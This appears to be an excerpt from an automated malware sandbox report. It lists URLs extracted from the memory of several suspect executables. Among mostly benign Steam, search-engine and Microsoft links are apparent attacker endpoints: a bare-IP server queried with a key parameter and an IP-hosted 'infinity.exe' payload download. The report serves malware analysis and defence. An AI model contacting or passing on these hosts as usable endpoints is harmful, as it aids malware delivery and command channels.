                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f812a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000337C000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f822a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f832a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003380000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f842a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f852a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f862a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f872a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f926d19fe6595cd66946851e91fcd85241
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/allowedCert_OS_1
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/en-GB
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ography
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/priseCertificates
                            Source: flv2aviconverter24.exe, 0000000C.00000003.2439668657.000000000332C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/rosoft
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000147E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000147E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/infinity.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000147E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/infinity.exe6
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C02F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                            Source: ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=eVGzFA1_2smb&a
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=S_dh0_Jk
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=bHp0
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/steG
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/steam_share_image.jpg
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=gOyfgA0bHRkL&am
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                            Source: ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: is-M72JG.tmp.34.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1328882210.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1328882210.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1328882210.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
